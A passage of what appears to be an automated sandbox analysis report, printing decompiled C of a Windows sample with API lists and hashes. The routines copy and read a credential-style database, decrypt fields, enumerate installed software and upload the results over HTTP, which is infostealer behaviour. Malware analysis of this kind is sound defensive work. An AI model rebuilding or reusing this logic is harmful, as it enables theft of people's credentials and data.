							_t448 = _t448 + 0x18;
							_t337 =  *0x61367c(_t441);
							_t354 = _v32;
							HttpSendRequestA(_t354, _v96, _t337, _v96, _t353);
							while(1) {
								_t341 = InternetReadFile(_t354,  &_v368, 0xc7,  &_v32); // executed
								if(_t341 == 0) {
									break;
								}
								_t342 = _v32;
								__eflags = _t342;
								if(__eflags != 0) {
									 *((char*)(_t444 + _t342 - 0x16c)) = 0;
									E0040EAEF(E0040EB6B(_a4, 0,  &_v108, __eflags,  &_v368), 0, _a4);
									E004016EF(_v108);
									continue;
								}
								break;
							}
							InternetCloseHandle(_t354);
						}
						InternetCloseHandle(_v36);
					}
				}
				InternetCloseHandle(_v72);
				_t179 = E00404BBC( &_v40, 0,  &_v44,  *_a4);
				_pop(_t358);
				_t458 = _t179;
				if(_t179 != 0) {
					E0040EAAB(_t358, _a4, 0x40fbe1);
					E0040EAEF(E0040EB6B(_a4, _t358,  &_v28, _t458, _v40), _t358, _a4);
					E004016EF(_v28);
				}
				_v36 =  &_v40;
				memset(_v36, 0, 4 << 0);
				_v36 =  &_v44;
				memset(_v36, 0, 4 << 0);
				E004016EF(_v96);
				E004016EF(_v68);
				E004016EF(_v16);
				E004016EF(_v84);
				E00401562( &_a8);
				E004016EF(_a88);
				return _a4;
			}

0x00403d36
0x00403d42
0x00403d4a
0x00403d55
0x00403d56
0x00403d60
0x00403d69
0x00403d69
0x00403d74
0x00403d7d
0x00403d86
0x00403d8f
0x00403d98
0x00403da7
0x00403dad
0x00403db3
0x00403db6
0x00403dbc
0x00403dc7
0x00403dc9
0x00403dc9
0x00403dcc
0x00403dcf
0x00403dda
0x00403de1
0x00403df0
0x00403df8
0x00403e00
0x00403e05
0x00403e19
0x00403e21
0x00403e39
0x00403e41
0x00403e57
0x00403e5f
0x00403e77
0x00403e7f
0x00403e93
0x00403e9b
0x00403ebc
0x00403ec4
0x00403ecc
0x00403ee8
0x00403eee
0x00403ef3
0x00403eff
0x00403f20
0x00403f26
0x00403f29
0x00403f2b
0x00403f44
0x00403f4c
0x00403f5f
0x00403f67
0x00403f7b
0x00403f83
0x00403f9c
0x00403fa4
0x00403fbd
0x00403fc5
0x00403fdd
0x00403fe5
0x00403ffb
0x00404003
0x00404017
0x0040401f
0x00404037
0x0040403f
0x00404055
0x0040405d
0x00404071
0x00404079
0x00404092
0x0040409a
0x004040b3
0x004040bb
0x004040d3
0x004040db
0x004040f1
0x004040f9
0x00404101
0x00404112
0x0040411e
0x00404127
0x0040413a
0x00404158
0x0040415a
0x00404162
0x00404168
0x00404170
0x004041ae
0x004041bb
0x004041c3
0x00000000
0x00000000
0x0040417d
0x00404180
0x00404182
0x00404184
0x004041a1
0x004041a9
0x00000000
0x004041a9
0x00000000
0x00404182
0x004041c6
0x004041c6
0x004041cf
0x004041cf
0x00403ef3
0x004041d8
0x004041e9
0x004041ee
0x004041ef
0x004041f1
0x004041fb
0x00404211
0x00404219
0x00404219
0x00404221
0x0040422e
0x00404233
0x00404240
0x00404245
0x0040424d
0x00404255
0x0040425d
0x00404265
0x0040426d
0x00404279

APIs

Part of subcall function 0040EA82: lstrcpy.KERNEL32(00000000,?), ref: 0040EAA1

Part of subcall function 00403093: malloc.MSVCRT ref: 004030C5
Part of subcall function 00403093: malloc.MSVCRT ref: 004030CB
Part of subcall function 00403093: malloc.MSVCRT ref: 004030D1
Part of subcall function 00403093: lstrlen.KERNEL32(000000FF,00000000,?), ref: 004030E3
Part of subcall function 00403093: InternetCrackUrlA.WININET(000000FF,00000000), ref: 004030EB

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403DA7
StrCmpCA.SHLWAPI(?), ref: 00403DBF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403EE8
lstrlen.KERNEL32(?,",004120A8,------,004120A8,",004120A8,------), ref: 00404101
lstrlen.KERNEL32(?), ref: 0040410C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404117
RtlAllocateHeap.NTDLL(00000000), ref: 0040411E
lstrlen.KERNEL32(?), ref: 00404129
memcpy.MSVCRT ref: 0040413A
lstrlen.KERNEL32(?), ref: 00404142
lstrlen.KERNEL32(?,?,00000000), ref: 0040414F
memcpy.MSVCRT ref: 00404158
lstrlen.KERNEL32(?,00000000,00000000), ref: 00404162
HttpSendRequestA.WININET(?,?,00000000), ref: 00404170
InternetReadFile.WININET(?,?,000000C7,?), ref: 004041BB
InternetCloseHandle.WININET(?), ref: 004041C6
InternetCloseHandle.WININET(?), ref: 004041CF
InternetCloseHandle.WININET(?), ref: 004041D8
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00403F20

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

Strings

", xrefs: 00403FCA, 004040C0
------, xrefs: 00403E26, 00403F31, 00404024

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlemalloc$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
String ID: "$------
API String ID: 759751014-2370822465
Opcode ID: cbbf44d1c5a37680ca8b927147fd70b97d9f32b732ae1c506d6fe2f593b5f27b
Instruction ID: 28e844d7d62ea72446f2ba3a85be3361dec761bd62e66671297562b864ddf588
Opcode Fuzzy Hash: cbbf44d1c5a37680ca8b927147fd70b97d9f32b732ae1c506d6fe2f593b5f27b
Instruction Fuzzy Hash: 05F1BA31E00029ABCF00EBA2DC869DEBBB6FF04304F554576B515B72A1D7396E56CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00405404 Relevance: 34.9, APIs: 23, Instructions: 351
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E00405404(void* __ecx, void* __eflags, CHAR* _a4, char _a16, char _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, char _a52) {
				void _v8;
				char _v12;
				char _v16;
				char _v28;
				CHAR* _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v88;
				char _v100;
				char _v112;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t128;
				void* _t149;
				char* _t153;
				void* _t167;
				void* _t185;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t212;
				void* _t214;
				void* _t216;
				void* _t231;
				intOrPtr* _t235;
				void* _t252;
				void* _t257;
				char* _t263;
				void* _t264;
				void* _t265;
				void* _t270;
				void* _t282;
				char* _t288;
				char* _t301;
				char* _t315;
				char* _t316;
				void* _t321;
				void* _t322;
				void* _t324;
				void* _t325;

				_t264 = __ecx;
				if(E0040EBBF( &_a28,  *0x61329c) != 0) {
					L2:
					E0040EAAB(_t264,  &_a16, 0x40fbe1);
					goto L4;
				} else {
					_t257 = E0040EBBF( &_a28,  *0x6132b8);
					_t329 = _t257;
					if(_t257 == 0) {
						__eflags = E0040EBBF( &_a16,  *0x613458);
						if(__eflags == 0) {
							L4:
							E0040EA50( &_v40, _t329, 0x40fbe1);
							E0040EAEF(E0040EB6B( &_v40, _t264,  &_v112, _t329,  *0x6133e4), _t264,  &_v40);
							E004016EF(_v112);
							_t128 = E0040D800(0x40fbe1,  &_v100, _t329, 0x1a);
							_pop(_t265);
							E0040EAEF(E0040EB29( &_v40, _t265, _t128,  &_v112, _t329), _t265,  &_v40);
							E004016EF(_v112);
							E004016EF(_v100);
							CopyFileA(_a4, _v40, 1); // executed
							E0040EA50( &_v28, _t329, 0x40fbe1);
							E0040EAEF(E0040EB6B( &_v28, _t265,  &_v112, _t329,  *0x6131c4), _t265,  &_v28);
							E004016EF(_v112);
							E0040EAEF(E0040EB6B( &_v28, _t265,  &_v112, _t329, 0x40fbe4), _t265,  &_v28);
							E004016EF(_v112);
							_t149 = E0040EB29( &_v28, _t265,  &_a28,  &_v112, _t329);
							_t301 =  &_v28;
							E0040EAEF(_t149, _t265, _t301);
							E004016EF(_v112);
							_t153 = _t301;
							_t330 = _a48;
							if(_a48 == 0) {
								E0040EAEF(E0040EB6B(_t153, _t265,  &_v112, __eflags, "_"), _t265,  &_v28);
								E004016EF(_v112);
								E0040EAEF(E0040EB6B(E0040EB29( &_v28, _t265,  &_a16,  &_v100, __eflags), _t265,  &_v112, __eflags,  *0x613248), _t265,  &_v28);
								E004016EF(_v112);
							} else {
								E0040EAEF(E0040EB6B(_t153, _t265,  &_v100, _t330,  *0x613248), _t265,  &_v28);
							}
							E004016EF(_v100);
							_t167 =  *0x6135c0(_v40,  &_v16); // executed
							if(_t167 == 0) {
								_t185 =  *0x61357c(_v16,  *0x613240, 0xffffffff,  &_v12, 0); // executed
								_t322 = _t321 + 0x14;
								if(_t185 == 0) {
									_t189 = RtlAllocateHeap(GetProcessHeap(), 0, 0x5f5e0ff); // executed
									_v8 = _t189;
									_t190 =  *0x613598(_v12);
									_pop(_t270);
									_t333 = _t190 - 0x64;
									if(_t190 == 0x64) {
										_t263 = "0";
										_t288 = "\t";
										do {
											E0040EA50( &_v112, _t333,  *0x6135b4(_v12, 0));
											E0040EA50( &_v64, _t333,  *0x6135b4(_v12, 1));
											E0040EA50( &_v100, _t333,  *0x6135b4(_v12, 2));
											E0040EA50( &_v52, _t333,  *0x6135b4(_v12, 3));
											E0040EA50( &_v76, _t333,  *0x6135b4(_v12, 4));
											_t212 =  *0x6135b4(_v12, 5);
											_pop(_t282);
											E0040EA50( &_v88, _t333, _t212);
											_t214 =  *0x613784(_v64, _t263);
											_t315 =  &_v64;
											if(_t214 != 0) {
												_push( *0x613048);
											} else {
												_push( *0x613334);
											}
											E0040EAAB(_t282, _t315);
											_t216 =  *0x613784(_v52);
											_t316 =  &_v52;
											if(_t216 != 0) {
												_push( *0x613048);
											} else {
												_push( *0x613334);
											}
											E0040EAAB(_t282, _t316);
											if( *_v76 == 0x2d) {
												E0040EAAB(_t282,  &_v76, _t263);
											}
											 *0x61375c(_v8, _v112);
											 *0x61375c(_v8, _t288);
											 *0x61375c(_v8, _v64);
											 *0x61375c(_v8, _t288);
											 *0x61375c(_v8, _v100);
											 *0x61375c(_v8, _t288);
											 *0x61375c(_v8, _v52);
											 *0x61375c(_v8, _t288);
											 *0x61375c(_v8, _v76);
											 *0x61375c(_v8, _t288);
											 *0x61375c(_v8, _v88);
											 *0x61375c(_v8, _t288);
											_t231 =  *0x6135a4(_v12, 6, _a40, _a44);
											_t235 = E00404DEB(_t231,  &_v124,  *0x6135ac(), _v12, 6);
											_t322 = _t322 + 0x20;
											 *0x61375c(_v8,  *_t235);
											E004016EF(_v124);
											 *0x61375c(_v8, "\n");
											E004016EF(_v88);
											E004016EF(_v76);
											E004016EF(_v52);
											E004016EF(_v100);
											E004016EF(_v64);
											E004016EF(_v112);
											_t252 =  *0x613598(_v12);
											_pop(_t270);
										} while (_t252 == 0x64);
									}
									_t191 =  *0x61367c(_v8);
									_t338 = _t191 - 5;
									if(_t191 > 5) {
										_push( *0x61367c(_v8));
										_push(_v8);
										_t324 = _t322 - 0xc;
										E0040EA82( &_v28, _t270, _t324, _t338);
										_t325 = _t324 - 0x50;
										E00401581( &_a52, _t325);
										_push( &_v124);
										E00403721(_t270, _t338);
										_t322 = _t325 + 0x68;
										E004016EF(_v124);
									}
									memset( &_v8, 0, 4);
								}
								 *0x61359c(_v12);
								 *0x6135c4(_v16); // executed
							}
							DeleteFileA(_v40); // executed
							E004016EF(_v40);
							E004016EF(_v28);
							E004016EF(0);
							E004016EF(0);
						}
					} else {
						goto L2;
					}
				}
				E004016EF(_a4);
				E004016EF(_a16);
				E004016EF(_a28);
				return E00401562( &_a52);
			}

0x00405404
0x00405422
0x00405436
0x0040543a
0x00000000
0x00405424
0x0040542d
0x00405432
0x00405434
0x0040544f
0x00405451
0x00405457
0x0040545b
0x00405474
0x0040547c
0x00405486
0x0040548d
0x0040549c
0x004054a4
0x004054ac
0x004054b9
0x004054c3
0x004054de
0x004054e6
0x004054fe
0x00405506
0x00405514
0x00405519
0x0040551c
0x00405524
0x00405529
0x0040552b
0x0040552e
0x00405558
0x00405560
0x00405584
0x0040558c
0x00405530
0x00405541
0x00405541
0x00405594
0x004055a0
0x004055aa
0x004055c0
0x004055c6
0x004055cb
0x004055de
0x004055e7
0x004055ea
0x004055f0
0x004055f1
0x004055f4
0x004055fa
0x004055ff
0x00405604
0x00405615
0x0040562b
0x00405641
0x00405657
0x0040566d
0x00405677
0x0040567e
0x00405683
0x0040568c
0x00405692
0x00405697
0x004056a1
0x00405699
0x00405699
0x00405699
0x004056a7
0x004056b0
0x004056b6
0x004056bb
0x004056c5
0x004056bd
0x004056bd
0x004056bd
0x004056cb
0x004056d6
0x004056dc
0x004056dc
0x004056e7
0x004056f1
0x004056fd
0x00405707
0x00405713
0x0040571d
0x00405729
0x00405733
0x0040573f
0x00405749
0x00405755
0x0040575f
0x00405770
0x0040578d
0x00405792
0x0040579a
0x004057a3
0x004057b0
0x004057b9
0x004057c1
0x004057c9
0x004057d1
0x004057d9
0x004057e1
0x004057e9
0x004057ef
0x004057f0
0x00405604
0x004057fc
0x00405802
0x00405805
0x00405810
0x00405811
0x00405817
0x0040581c
0x00405821
0x00405829
0x00405831
0x00405832
0x0040583a
0x0040583d
0x0040583d
0x0040584a
0x00405850
0x00405856
0x00405860
0x00405866
0x0040586a
0x00405873
0x0040587b
0x00405882
0x00405889
0x00405889
0x00000000
0x00000000
0x00000000
0x00405434
0x00405891
0x00405899
0x004058a1
0x004058b2

APIs

Part of subcall function 0040EBBF: StrCmpCA.SHLWAPI(?,?,?,0040541B,?,?,?), ref: 0040EBC8

CopyFileA.KERNEL32(?,?,00000001), ref: 004054B9
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004055D7
RtlAllocateHeap.NTDLL(00000000), ref: 004055DE
StrCmpCA.SHLWAPI(?,00412128,00000000), ref: 0040568C
StrCmpCA.SHLWAPI(?,00412128), ref: 004056B0
lstrcat.KERNEL32(0040651A,?), ref: 004056E7
lstrcat.KERNEL32(0040651A,0041212C), ref: 004056F1
lstrcat.KERNEL32(0040651A,?), ref: 004056FD
lstrcat.KERNEL32(0040651A,0041212C), ref: 00405707
lstrcat.KERNEL32(0040651A,?), ref: 00405713
lstrcat.KERNEL32(0040651A,0041212C), ref: 0040571D
lstrcat.KERNEL32(0040651A,?), ref: 00405729
lstrcat.KERNEL32(0040651A,0041212C), ref: 00405733
lstrcat.KERNEL32(0040651A,?), ref: 0040573F
lstrcat.KERNEL32(0040651A,0041212C), ref: 00405749
lstrcat.KERNEL32(0040651A,?), ref: 00405755
lstrcat.KERNEL32(0040651A,0041212C), ref: 0040575F

Part of subcall function 00404DEB: memcmp.MSVCRT ref: 00404E09
Part of subcall function 00404DEB: memset.MSVCRT ref: 00404E3B
Part of subcall function 00404DEB: LocalAlloc.KERNEL32(00000040,-000000E1), ref: 00404E71

lstrcat.KERNEL32(0040651A,00000000), ref: 0040579A
lstrcat.KERNEL32(0040651A,00412120), ref: 004057B0
lstrlen.KERNEL32(0040651A), ref: 004057FC
lstrlen.KERNEL32(0040651A), ref: 0040580A
memset.MSVCRT ref: 0040584A
DeleteFileA.KERNEL32(?,?), ref: 0040586A

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeaplstrlenmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 1709161455-0
Opcode ID: 2c9fe7416e66fcc0bbe171bac7276880c727aeb7905649843e872c032cfe9163
Instruction ID: 302324e8468b2e9017a521c16ed29a31f0579ff762346a5e4b62b1f548b0fca9
Opcode Fuzzy Hash: 2c9fe7416e66fcc0bbe171bac7276880c727aeb7905649843e872c032cfe9163
Instruction Fuzzy Hash: CAD1F472900119AFCF01ABA1DD469CDBB76EF04304F149466F602B72B1DB3AAE259B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4D1 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0040D4D1(void* __eflags, intOrPtr _a4, void* _a8) {
				int _v8;
				void* _v12;
				char _v24;
				void* _v28;
				int* _v32;
				int _v36;
				long _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v88;
				char _v1112;
				char _v2136;
				char _v3160;
				void* __esi;
				long _t62;
				long _t65;
				long _t77;
				long _t82;
				long _t100;
				void* _t119;
				intOrPtr _t122;
				void* _t131;

				_t1 =  &_v24; // 0x412120
				_t121 = _t1;
				E0040EA50(_t1, __eflags, 0x40fbe1);
				_v28 = 0;
				_t4 =  &_a8; // 0x412120
				_v12 = 0;
				_v36 = 0xf003f;
				_v8 = 0;
				_t62 = RegOpenKeyExA( *_t4,  *0x613474, 0, 0x20019,  &_v28); // executed
				_t133 = _t62;
				if(_t62 == 0) {
					_v32 = 0;
					do {
						_v8 = 0x400;
						_t65 = RegEnumKeyExA(_v28, _v32,  &_v2136,  &_v8, 0, 0, 0, 0); // executed
						_v40 = _t65;
						__eflags = _t65;
						if(_t65 != 0) {
							goto L10;
						}
						wsprintfA( &_v3160, "%s\\%s",  *0x613474,  &_v2136);
						_t131 = _t131 + 0x10;
						_t77 = RegOpenKeyExA(_a8,  &_v3160, 0, 0x20019,  &_v12); // executed
						__eflags = _t77;
						if(__eflags != 0) {
							RegCloseKey(_v12);
							L13:
							RegCloseKey(_v28);
							_t122 = _a4;
							E0040EA82( &_v24, _t119, _t122, __eflags);
							E004016EF(_v24);
							goto L14;
						}
						_v8 = 0x400;
						_t82 = RegQueryValueExA(_v12,  *0x6134e8, 0,  &_v36,  &_v1112,  &_v8); // executed
						__eflags = _t82;
						if(_t82 == 0) {
							__eflags =  *0x61367c( &_v1112) - 1;
							if(__eflags > 0) {
								E0040EAEF(E0040EB6B( &_v24, _t119,  &_v88, __eflags, "\n\t"), _t119,  &_v24);
								E004016EF(_v88);
								E0040EAEF(E0040EB6B( &_v24, _t119,  &_v52, __eflags,  &_v1112), _t119,  &_v24);
								E004016EF(_v52);
								_v8 = 0x400;
								_t100 = RegQueryValueExA(_v12,  *0x613318, 0,  &_v36,  &_v1112,  &_v8); // executed
								__eflags = _t100;
								if(__eflags == 0) {
									E0040EAEF(E0040EB6B( &_v24, _t119,  &_v76, __eflags, " - "), _t119,  &_v24);
									E004016EF(_v76);
									E0040EAEF(E0040EB6B( &_v24, _t119,  &_v64, __eflags,  &_v1112), _t119,  &_v24);
									E004016EF(_v64);
								}
							}
						}
						RegCloseKey(_v12); // executed
						L10:
						_v32 = _v32 + 1;
						__eflags = _v40;
					} while (__eflags == 0);
					goto L13;
				} else {
					_t122 = _a4;
					E0040EA82(_t121, _t119, _t122, _t133);
					E004016EF(_v24);
					L14:
					return _t122;
				}
			}

0x0040d4e1
0x0040d4e1
0x0040d4e4
0x0040d4fb
0x0040d4fe
0x0040d501
0x0040d504
0x0040d50b
0x0040d50e
0x0040d514
0x0040d516
0x0040d530
0x0040d538
0x0040d54a
0x0040d550
0x0040d556
0x0040d559
0x0040d55b
0x00000000
0x00000000
0x0040d57a
0x0040d580
0x0040d597
0x0040d59d
0x0040d59f
0x0040d6a9
0x0040d6af
0x0040d6b2
0x0040d6b8
0x0040d6be
0x0040d6c6
0x00000000
0x0040d6cb
0x0040d5bb
0x0040d5c1
0x0040d5c7
0x0040d5c9
0x0040d5dc
0x0040d5df
0x0040d5f8
0x0040d600
0x0040d61a
0x0040d622
0x0040d63d
0x0040d643
0x0040d649
0x0040d64b
0x0040d660
0x0040d668
0x0040d682
0x0040d68a
0x0040d68a
0x0040d64b
0x0040d5df
0x0040d692
0x0040d698
0x0040d698
0x0040d69b
0x0040d69b
0x00000000
0x0040d518
0x0040d51a
0x0040d51d
0x0040d525
0x0040d6cd
0x0040d6d1
0x0040d6d1

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

RegOpenKeyExA.KERNEL32( !A !A,00000000,00020019,80000002,0040FBE1,00000000,?), ref: 0040D50E
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,00412120), ref: 0040D550
wsprintfA.USER32 ref: 0040D57A
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040D597
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040D5C1
lstrlen.KERNEL32(?), ref: 0040D5D6
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,0041219C), ref: 0040D643

Part of subcall function 0040EA82: lstrcpy.KERNEL32(00000000,?), ref: 0040EAA1

Strings

- , xrefs: 0040D64D
!A !A, xrefs: 0040D4FE
!A !A !A !A, xrefs: 0040D4E1
%s\%s, xrefs: 0040D574

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
String ID: !A !A$ !A !A !A !A$ - $%s\%s
API String ID: 1989970852-2602442905
Opcode ID: 28d7efa5d06c62ce16e95b90e1d13dd3b8b5d0a648a68911c51a76cdedb19f29
Instruction ID: 9655a073b3faa03d17b91476ec753a47f1aea80a1f4c7a26005bf0a150514f14
Opcode Fuzzy Hash: 28d7efa5d06c62ce16e95b90e1d13dd3b8b5d0a648a68911c51a76cdedb19f29
Instruction Fuzzy Hash: AE512471D00119ABCF00EF91DD859EEBBB9EF44309F144166F501B32A1D739AF998B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040310B Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 379
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E0040310B(void* __ecx, void* __eflags, intOrPtr* _a4, char _a8, char _a20, char _a32) {
				char _v16;
				char _v28;
				long _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v56;
				char _v68;
				void* _v72;
				long _v84;
				char _v96;
				char* _v108;
				char _v120;
				char* _v136;
				short _v156;
				char* _v164;
				intOrPtr _v176;
				void _v180;
				char _v240;
				void _v2240;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t174;
				void* _t181;
				void* _t185;
				void* _t213;
				void* _t254;
				void* _t259;
				long _t346;
				long _t351;
				void* _t363;
				signed int _t365;
				void* _t367;
				void* _t454;
				void* _t455;

				_t461 = __eflags;
				E0040EA82( &_a8, __ecx, _t455 - 0xc, __eflags);
				_push( &_v240); // executed
				_t174 = E00403093(); // executed
				_t365 = 0xf;
				memcpy( &_v180, _t174, _t365 << 2);
				E0040EA50(_a4, _t461, 0x40fbe1);
				E0040EA50( &_v96, _t461, 0x40fbe1);
				E0040EA50( &_v16, _t461, 0x40fbe1);
				E0040EA50( &_v68, _t461, 0x40fbe1);
				E0040EA50( &_v108, _t461, 0x40fbe1);
				_t181 = InternetOpenA(0, 1, 0, 0, 0); // executed
				_push( *0x6133c0);
				_v72 = _t181;
				_push(_v176);
				_v32 = 0;
				if( *0x613784() == 0) {
					_v32 = 1;
				}
				_t463 = _v72;
				if(_v72 != 0) {
					_t213 = E0040D800(0x40fbe1,  &_v56, _t463, 0x14);
					_pop(0);
					E0040EAEF(E0040EB29( &_v96, 0, _t213,  &_v84, _t463), 0,  &_v96);
					E004016EF(_v84);
					E004016EF(_v56);
					E0040EAEF(E0040EB6B( &_v68, 0,  &_v56, _t463, "\r\n"), 0,  &_v68);
					E004016EF(_v56);
					E0040EAEF(E0040EB6B( &_v68, 0,  &_v56, _t463, "------"), 0,  &_v68);
					E004016EF(_v56);
					E0040EAEF(E0040EB29( &_v68, 0,  &_v96,  &_v56, _t463), 0,  &_v68);
					E004016EF(_v56);
					E0040EAEF(E0040EB6B( &_v68, 0,  &_v56, _t463, "--"), 0,  &_v68);
					E004016EF(_v56);
					E0040EAEF(E0040EB6B( &_v68, 0,  &_v56, _t463, "\r\n"), 0,  &_v68);
					E004016EF(_v56);
					E0040EAEF(E0040EB29(E0040EB6B( &_v108, 0,  &_v28, _t463,  *0x613070), 0,  &_v96,  &_v84, _t463), 0,  &_v108);
					E004016EF(_v84);
					E004016EF(_v28);
					_t254 = InternetConnectA(_v72, _v164, _v156, 0, 0, 3, 0, 0); // executed
					_v36 = _t254;
					if(_t254 != 0) {
						asm("sbb eax, eax");
						_t259 = HttpOpenRequestA(_v36,  *0x6133dc, _v136,  *0x613208, 0, 0, ( ~_v32 & 0x00800000) + 0x400100, 0); // executed
						_v32 = _t259;
						_t465 = _t259;
						if(_t259 != 0) {
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t465, "------"), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB29( &_v16, 0,  &_v96,  &_v28, _t465), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t465, "\r\n"), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v56, _t465,  *0x61323c), 0,  &_v16);
							E004016EF(_v56);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t465,  *0x61339c), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t465, "\"\r\n\r\n"), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB29( &_v16, 0,  &_a20,  &_v28, _t465), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t465, "\r\n"), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t465, "------"), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB29( &_v16, 0,  &_v96,  &_v28, _t465), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t465, "\r\n"), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v56, _t465,  *0x61323c), 0,  &_v16);
							E004016EF(_v56);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t465,  *0x613444), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB6B( &_v16, 0,  &_v28, _t465, "\"\r\n\r\n"), 0,  &_v16);
							E004016EF(_v28);
							E0040EAEF(E0040EB29( &_v16, 0,  &_a32,  &_v28, _t465), 0,  &_v16);
							E004016EF(_v28);
							E0040EA50( &_v84, _t465, 0x40fbe1);
